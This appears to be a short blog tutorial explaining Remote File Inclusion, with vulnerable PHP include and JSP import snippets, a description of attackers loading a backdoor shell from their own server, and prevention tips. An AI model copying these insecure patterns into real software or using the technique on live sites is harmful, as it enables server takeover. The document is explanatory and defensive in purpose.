Remote File Inclusion(RFI) is a vulnerability in a web application where a file from an attacker server can be inserted into the web application. There can be two scenarios for this. First, requirement might be display the content from a file or read the file. The other might be the security weakness in the code that allows this attack. The major purpose or most commonly used way in exploiting this attack is arbitrary code execution. Where attacker can take control over the web server.
Let’s look a classing PHP code which leads to this attack…
|/** * Using GET method to receive the file * Example URL – http://hackable.com/?file=article.php */ $file = $_GET[‘file’]; /** * using include function to include the file * Example – article.php */ include($file);|
Now, this code is deployed in the web server. What an attacker will think first is to include the file from attacking machine.
Looking at above example, the malicious file from attacker site is included into target web application. Attacker created a malicious backdoor shell page which will execute the code from within the target web application giving enough control to the attacker to take control.
Another example with Java Servlet Page(jsp) code using import tag
|… <c:import url=”<%= request.getParameter(“contacts”)%>”> …|
Even in this scenario, the attacker can include the malicious file and execute commands in the target web application.
What’s leading to this attack?
First and foremost thing is unsanitized input passed into the web server from user. Any unsanitized/filtered input from the user leads to lots of security loop holes in the web application.
Prevention from this attack
- Always sanitize the user input from HTTP request. Never trust the user-supplied input blindly from the HTTP request without proper sanitization.
- Use frameworks or CMS or libraries in your application which is free from file inclusion vulnerability.
- Disable include function if it is not necessary to all user roles in the application. Have a strong access control check before processing the request from the user.
- If the function is needed, whitelist the file extension and allow that file in your web application on the server-side, not client-side (but there are always lots of options available to bypass this control)